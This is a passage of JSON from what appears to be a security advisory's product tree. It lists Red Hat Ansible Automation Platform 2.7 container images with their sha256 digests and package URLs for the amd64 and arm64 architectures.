"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9\u0026tag=1785435970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Adf86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator\u0026tag=1785284604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9\u0026tag=1785374215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Ab5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9\u0026tag=1785376164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Af3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator\u0026tag=1785284271"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Afc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9\u0026tag=1785379466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator\u0026tag=1785284053"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9\u0026tag=1785375884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Ab08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9\u0026tag=1785446384"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9\u0026tag=1785448519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Afb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1785362265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1785359851"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9\u0026tag=1785405904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator\u0026tag=1785284988"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Aa5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9\u0026tag=1785344556"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/receptor-rhel9\u0026tag=1785389482"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3Ad014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9\u0026tag=1785413994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Aaf38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9\u0026tag=1785370597"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Ad997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9\u0026tag=1785373001"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3Add6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9\u0026tag=1785356349"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Af7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9\u0026tag=1785442801"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9\u0026tag=1785426734"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ace712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9\u0026tag=1785375273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator\u0026tag=1785283956"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Ab0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9\u0026tag=1785374970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9\u0026tag=1785378052"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator\u0026tag=1785284040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9\u0026tag=1785374869"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator\u0026tag=1785284218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9\u0026tag=1785378596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9\u0026tag=1785435970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Ab2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator\u0026tag=1785284604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9\u0026tag=1785374215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9\u0026tag=1785376164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"product_identification_helper": {
